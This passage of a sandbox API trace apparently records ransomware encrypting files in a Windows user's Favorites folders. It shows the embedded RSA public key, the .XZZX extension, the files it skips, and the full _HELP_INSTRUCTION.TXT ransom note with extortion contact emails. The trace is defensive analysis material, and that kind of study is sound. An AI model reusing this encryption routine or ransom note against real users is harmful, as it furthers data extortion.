LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.828] lstrcpyW (in: lpString1=0x17be7c, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0110.828] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0110.829] Sleep (dwMilliseconds=0x96) [0110.984] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0110.984] lstrcmpW (lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpString2="..") returned 1 [0110.984] lstrcmpW (lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpString2=".") returned 1 [0110.984] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0110.984] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="ntldr") returned 0x0 [0110.984] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="NTLDR") returned 0x0 [0110.984] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0110.984] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0110.984] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0110.984] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0110.984] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0110.984] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0110.984] lstrcpyW (in: lpString1=0x17be7c, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0110.984] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0110.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x470 [0110.984] Sleep (dwMilliseconds=0x96) [0111.140] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.140] lstrcmpW (lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpString2="..") returned 1 [0111.140] lstrcmpW (lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpString2=".") returned 1 [0111.140] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0111.140] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="ntldr") returned 0x0 [0111.140] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="NTLDR") returned 0x0 [0111.140] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0111.140] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0111.140] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0111.140] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0111.140] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0111.140] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.140] lstrcpyW (in: lpString1=0x17be7c, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0111.140] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0111.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0111.141] Sleep (dwMilliseconds=0x96) [0111.296] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.296] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0111.296] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0111.297] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0111.297] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0111.297] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0111.297] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0111.297] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0111.297] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0111.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0111.297] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0111.297] SetErrorMode (uMode=0x1) returned 0x1 [0111.298] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT") returned 80 [0111.298] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0111.298] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0111.298] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x478) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x478, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbb210, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cbb210*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0111.298] RegCloseKey (hKey=0x478) returned 0x0 [0111.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0111.298] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0111.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0111.299] CloseHandle (hObject=0x478) returned 1 [0111.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0111.299] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0111.299] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0111.299] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0111.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0111.299] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.299] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0111.299] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.299] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.299] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.299] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.299] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.299] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.300] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0111.300] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0111.300] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0111.300] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0111.300] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0111.300] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0111.300] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0111.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0111.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0111.300] SetErrorMode (uMode=0x1) returned 0x1 [0111.300] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0111.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.300] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0111.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0111.301] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0111.301] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0111.301] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.302] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.302] lstrcmpW (lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX", lpString2="..") returned 1 [0111.302] lstrcmpW (lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX", lpString2=".") returned 1 [0111.302] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0111.302] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="ntldr") returned 0x0 [0111.302] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="NTLDR") returned 0x0 [0111.302] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0111.302] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="ntdetect.com") returned 0x0 [0111.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0111.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0111.302] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0111.302] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.302] lstrcpyW (in: lpString1=0x17be7c, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0111.302] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x480 [0111.302] Sleep (dwMilliseconds=0x96) [0111.452] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.452] lstrcmpW (lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX", lpString2="..") returned 1 [0111.452] lstrcmpW (lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX", lpString2=".") returned 1 [0111.452] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0111.452] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="ntldr") returned 0x0 [0111.452] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="NTLDR") returned 0x0 [0111.452] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0111.452] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0111.452] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0111.452] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0111.452] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0111.452] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.452] lstrcpyW (in: lpString1=0x17be7c, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0111.452] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0111.453] Sleep (dwMilliseconds=0x96) [0111.608] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0111.608] lstrcmpW (lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpString2="..") returned 1 [0111.608] lstrcmpW (lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpString2=".") returned 1 [0111.608] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0111.608] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="ntldr") returned 0x0 [0111.608] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="NTLDR") returned 0x0 [0111.608] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0111.608] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="ntdetect.com") returned 0x0 [0111.608] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0111.608] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0111.608] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0111.608] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB 